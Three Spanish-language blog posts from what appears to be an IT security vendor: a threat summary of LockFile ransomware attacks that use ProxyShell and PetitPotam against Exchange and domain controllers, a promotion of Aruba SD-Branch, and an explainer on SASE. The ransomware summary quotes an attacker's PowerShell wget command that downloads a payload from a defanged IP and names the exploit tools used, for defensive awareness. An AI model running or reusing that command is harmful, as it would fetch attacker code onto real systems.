Microsoft Exchange PetitPotam

Investigadores han identificado un exploit para proxyshell, se descubrió que el proxyshell estaba siendo usado desde el 13 de agosto, y lo que concluye es que se trataría de una nueva variante de ransomware dirigida a varias industrias mundiales. Los atacantes obtienen acceso a las redes de las víctimas a través de servidores de Microsoft Exchange y luego usan la vulnerabilidad PetitPotam actualizada incompletamente para obtener acceso al controlador de dominio y luego se propagarse por la red.

Quedó catalogado con en el CVE-2021-36942. Los actores de la amenaza detrás de la familia de ransomware LockFile afectan directamente a los sectores de fabricación, financiero, de ingeniería, legal, de negocios, de viajes y de turismo en los Estados Unidos y Asia. Los actores de la amenaza están utilizando la vulnerabilidad PetitPotam, parcialmente parcheada, para obtener acceso al controlador de dominio después de obtener acceso a los servidores Microsoft Exchange en la red. La operación está utilizando una versión legítima de KuGou Active Desktop y la herramienta de código abierto Kernel Driver Utility junto con el ransomware.

El equipo ATR de McAfee recopila y analiza información de múltiples fuentes abiertas y cerradas antes de difundir los informes de inteligencia. Esta campaña fue investigada por Symantec y compartida públicamente. En la cadena de ataque los servidores de Exchange podrían estar ejecutando un comando de PowerShell wget hxxp://209.14.0[.] 234:46613/VcEtrKighyIFS5foGNXH. Por lo general, alrededor de 20 a 30 minutos antes de la implementación de ransomware, los atacantes instalan un conjunto de herramientas en el servidor de Exchange comprometido. En estas herramientas se incluye: Un exploit para la vulnerabilidad CVE-2021-36942 (también conocido como PetitPotam). El código parece copiarse de https://github.com/zcgonvh/EfsPotato. Esto está en un archivo llamado “efspotato.exe”. Dos archivos: active_desktop_render.dll y active_desktop_launcher.exe.

Conclusiones

  • PetitPotam, divulgado por el investigador de seguridad francés Lionel Gilles, es comparable al error PrintSpooler pero utiliza la API MS-EFSRPC para forzar la autenticación en lugar de MS-RPRN.
  • El protocolo remoto del sistema de archivos cifrados se utiliza para administrar de forma remota los objetos de datos en forma cifrada. EfsRpcOpenFileRaw, el método API utilizado en este ataque, es responsable de abrir y restaurar objetos cifrados creados por el sistema de archivos cifrados y es el origen del intento de autenticación.
  • La diferencia evidente entre ambos exploits es que PetitPotam no requiere ninguna autenticación cuando se dirige a los controladores de dominio.

Fuentes:

La Red Extendida y Continuidad Del Negocio

En medio de la transformación digital, en la necesidad de asegurar la continuidad de su negocio y el compromiso de brindar a sus colaboradores herramientas para gestionar sus labores de manera segura son el tipo de escenarios a los que se enfrentan las organizaciones y TI en una lucha continua por minimizar los riesgos que conlleva el teletrabajo.

Uno de los factores que más son tenidos en cuenta en las áreas TI de las organizaciones es la manera de gestionar y administrar dichas soluciones, con la transformación digital la gestión de recursos ha cambiado y con ello sus necesidades, el área de TI requiere una gestión centralizada con la capacidad de brindarle métricas en tiempo real de los recursos desplegados.

SD-Branch en WLAN

SD-Branch de Aruba soluciona la complejidad de extender las redes corporativas de manera remota brindando acceso a los usuarios desde cualquier parte a los recursos dispuestos por la organización, además esta solución cuenta con la capacidad de realizar conmutación por error que minimiza las interrupciones del servicio en los sitios remotos.

La solución de SD-Branch de Aruba cumple con las expectativas de las organizaciones teniendo en cuenta la problemática mencionada anteriormente, ya que cuenta con una administración centralizada en la nube de todos sus recursos que ayuda a los departamentos de TI a tener visibilidad de los mismos y brindar un mejor soporte a los usuarios corporativos.

Para que los usuarios puedan usar los recursos de red dispuestos por la organización, requieren un Access Point que junto con un Gateway, llevarán todos los recursos de la organización de manera segura y con administración en la nube a cualquier lugar donde se encuentre el usuario.

Administración en la Nube

Aruba Central es la única consola de administración en la nube que permite gestionar las operaciones LAN-cableadas, WLAN, VPN y SD.WAN. Aruba Central de manera unificada permite simplificar la implementación, administración y orquestación de la red.

Ventajas

  • Funcionamiento remoto de las aplicaciones sin interrupciones.
  • Conmutación por error para minimizar y asegurar la continuidad de la conexión.
  • Diseño fácil de instalar.
  • Autenticación basada en roles de usuario.
  • Cumplimiento normativo con generación de informes.
  • Flexibilidad para extender la red, ya sea con Access Point o VIA de Aruba.

Conclusiones

 La transformación digital y el entorno en el cual estamos viviendo implica varios retos para las organizaciones y sus colaboradores, para el área TI retos de administración, de gestión, soporte remoto y seguridad en su red; para los colaboradores, ambientes de trabajo óptimos para sus labores, optimización de tiempo y recursos, y la más importante que tienen en común, la seguridad en su conectividad.

 Todos estos retos los podemos simplificar con SD-Branch en WLAN, llevando la oficina a su casa o a cualquier parte de manera segura y continua, sin arduos métodos de administración y de implementación, gestión en la nube y versatilidad para usted y sus colaboradores.

Fuentes:

¿Cómo SASE está definiendo la seguridad de la red en nube?

SASE es definido como marco para abordar redes seguras, optando por campos de tecnología más eficientes. A medida que la actividad y transformación digital continúan avanzando, existe una demanda cada vez mayor de soluciones de infraestructura que requerirán que las organizaciones se conecten desde más ubicaciones a mayores velocidades y manteniendo seguras las infraestructuras de datos.

El trabajo fuera de la organización fomenta una fuerza laboral y recursos a nivel de seguridad adicional, lo cual se vuelve necesario el acceso directo a Internet y eliminar la necesidad de enrute de tráfico a través de su centro de datos.

Es así como SASE (Secure access service Edge), busca una colección de servicios existentes que se integran como un conjunto común de funciones. La capacidad de SASE para ofrecer múltiples soluciones de redes seguras integradas a través de un solo servicio tiene un enorme potencial para cualquier organización que deba proteger datos de alto valor en múltiples ubicaciones y casos de uso.

Cada servicio de SASE reúne las tecnologías de seguridad más importantes, en un solo servicio nativo de la nube y de hiper escala que proporciona inspección la seguridad en un solo paso con una latencia baja y una disponibilidad del 99,99 %, dentro de estos servicios encontramos:

  •   Agente de seguridad de acceso a la nube (CASB)
  • Next-gen Secure Web Gateway (SWG)
  • Prevención de pérdida de datos (DLP)
  • Aislamiento remoto del navegador (RBI)
  • Otras funcionalidades de seguridad de red como ( FWaaS  ZTNA, SDWAN) para respaldar las necesidades de acceso seguro y dinámico de las organizaciones.

Básicamente SASE es un nuevo paquete de tecnologías que incluye SD-WAN, SWG, CASB, ZTNA y FWaaS como capacidades centrales, con la capacidad de identificar datos confidenciales o malware y la capacidad de descifrar contenido a la velocidad de la línea, con monitoreo continuo de sesiones aumentando niveles de riesgo y confianza.

El futuro de la seguridad de la red está en la nube

Como resultado, las redes SASE permiten a las organizaciones:

  • Simplificar la gestión.
  •  Escalar elásticamente.
  •  Implementar dinámicamente capacidades de red y seguridad según sea necesario.
  •  Consumo de capacidades de seguridad y de red versátiles como aplicaciones basadas en la nube.

   Fuentes:
– https://www.mcafee.com/enterprise/es-mx/security-awareness/cloud/what-is-sase.html
– https://www.gartner.com/doc/3999828
– https://www.sciencedirect.com/science/article/abs/pii/S1353485820301392